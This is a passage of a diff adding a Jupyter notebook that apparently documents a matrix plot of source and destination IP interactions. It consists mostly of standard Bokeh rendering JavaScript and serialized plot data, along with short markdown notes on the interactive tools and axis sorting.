AAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAUQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAkQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAUQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[86]},\"row_count\":[1,1,1,1,1,1,1,2,1,1,1,2,1,1,1,1,3,1,1,1,1,1,1,2,1,1,1,1,1,2,1,1,1,1,1,1,2,1,1,2,1,1,1,1,1,2,1,1,1,2,1,1,1,1,1,1,1,1,4,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],\"size\":[1,1,1,1,1,1,1,2,1,1,1,2,1,1,1,1,3,1,1,1,1,1,1,2,1,1,1,1,1,2,1,1,1,1,1,1,2,1,1,2,1,1,1,1,1,2,1,1,1,2,1,1,1,1,1,1,1,1,4,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1047\"},\"selection_policy\":{\"id\":\"1048\"}},\"id\":\"1003\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1045\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1003\"}},\"id\":\"1039\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1042\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{\"text\":\"IP Interaction\",\"text_font_size\":\"15pt\"},\"id\":\"1005\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1011\",\"type\":\"CategoricalScale\"},{\"attributes\":{},\"id\":\"1041\",\"type\":\"AllLabels\"},{\"attributes\":{\"factors\":[\"40.77.228.69\",\"52.168.138.145\",\"13.71.172.130\",\"40.91.75.5\",\"40.124.45.19\",\"13.71.172.128\",\"172.217.15.99\",\"20.38.98.100\",\"104.43.212.12\",\"65.55.44.109\",\"13.65.107.32\",\"52.165.170.112\",\"72.21.81.200\",\"72.21.91.29\",\"65.55.44.108\",\"72.21.81.240\",\"40.77.232.95\",\"13.67.143.117\",\"13.68.93.109\",\"23.48.36.78\",\"8.249.241.254\",\"40.77.226.250\",\"52.239.152.10\",\"90.130.70.73\",\"13.83.148.218\",\"23.4.187.27\",\"99.84.104.63\",\"157.55.134.136\"]},\"id\":\"1009\",\"type\":\"FactorRange\"},{\"attributes\":{},\"id\":\"1013\",\"type\":\"CategoricalScale\"},{\"attributes\":{},\"id\":\"1024\",\"type\":\"ResetTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"red\"},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"SourceIP\"},\"y\":{\"field\":\"DestinationIP\"}},\"id\":\"1036\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1044\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis\":{\"id\":\"1015\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1017\",\"type\":\"Grid\"},{\"attributes\":{\"axis_label\":\"DestinationIP\",\"axis_line_color\":null,\"formatter\":{\"id\":\"1042\"},\"major_label_policy\":{\"id\":\"1041\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"11pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"1019\"}},\"id\":\"1018\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"overlay\":{\"id\":\"1026\"}},\"id\":\"1022\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1047\",\"type\":\"Selection\"},{\"attributes\":{\"factors\":[\"10.0.3.5\",\"104.43.212.12\",\"13.107.4.50\",\"13.65.107.32\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.130\",\"13.83.148.218\",\"131.107.147.209\",\"157.55.134.136\",\"172.217.15.99\",\"172.217.8.14\",\"20.38.98.100\",\"205.185.216.42\",\"23.4.187.27\",\"23.48.36.78\",\"40.124.45.19\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.232.95\",\"40.91.75.5\",\"52.165.170.112\",\"52.168.138.145\",\"52.239.152.10\",\"65.55.163.76\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.81.240\",\"72.21.91.29\",\"8.249.241.254\",\"90.130.70.73\",\"99.84.104.63\"]},\"id\":\"1007\",\"type\":\"FactorRange\"},{\"attributes\":{},\"id\":\"1019\",\"type\":\"CategoricalTicker\"},{\"attributes\":{},\"id\":\"1016\",\"type\":\"CategoricalTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1021\"},{\"id\":\"1022\"},{\"id\":\"1023\"},{\"id\":\"1024\"},{\"id\":\"1025\"},{\"id\":\"1033\"}]},\"id\":\"1027\",\"type\":\"Toolbar\"},{\"attributes\":{\"axis_label\":\"SourceIP\",\"axis_line_color\":null,\"formatter\":{\"id\":\"1045\"},\"major_label_orientation\":1.5707963267948966,\"major_label_policy\":{\"id\":\"1044\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"11pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"1016\"}},\"id\":\"1015\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"axis\":{\"id\":\"1018\"},\"dimension\":1,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1020\",\"type\":\"Grid\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"red\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"SourceIP\"},\"y\":{\"field\":\"DestinationIP\"}},\"id\":\"1037\",\"type\":\"Circle\"}],\"root_ids\":[\"1004\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"4886a7c7-79bd-447a-b046-29ff5c453ce1\",\"root_ids\":[\"1004\"],\"roots\":{\"1004\":\"0ffe5812-238b-4500-9fbd-c6ddf970b799\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1004"
+      }
+     }
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "Figure(id='1004', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1004', <span id=\"1101\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[CategoricalAxis(id='1015', ...)],</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='1017', ...), Grid(id='1020', ...)],</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;700,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[CategoricalAxis(id='1018', ...)],</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GlyphRenderer(id='1038', ...)],</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='1005', ...),</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='1027', ...),</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'above',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;900,</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;FactorRange(id='1007', ...),</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;CategoricalScale(id='1011', ...),</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;FactorRange(id='1009', ...),</div></div><div class=\"1100\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;CategoricalScale(id='1013', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"1101\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"1100\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 3
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Using the Bokeh interactive tools\r\n",
+    "\r\n",
+    "The Bokeh graph is interactive and has the following features:\r\n",
+    "- Tooltip display for each event marker as you hover over it\r\n",
+    "- Toolbar with the following tools (most are toggles enabling or disabling the tool):\r\n",
+    "  - Panning \r\n",
+    "  - Select zoom\r\n",
+    "  - Mouse wheel zoom\r\n",
+    "  - Reset to default view\r\n",
+    "  - Save image to PNG\r\n",
+    "  - Hover tool"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Sorting the X and Y values\r\n",
+    "\r\n",
+    "You can use `sort` to sort both axes or `sort_x` and `sort_y` to individually sort the values.\r\n",
+    "\r\n",
+    "The sort parameters take values \"asc\" (ascending), \"desc\" (descending), `True` (ascending).\r\n",
+    "`None` and `False` produce no sorting."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 25,
+   "source": [
+    "net_df.mp_plot.matrix(\r\n",
+    "    x=\"SourceIP\",\r\n",
+    "    y=\"DestinationIP\",\r\n",
+    "    title=\"IP Interaction\",\r\n",
+    "    sort_y=\"asc\",\r\n",
+    "    sort_x=False,\r\n",
+    ")"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"3022\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"3022\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if 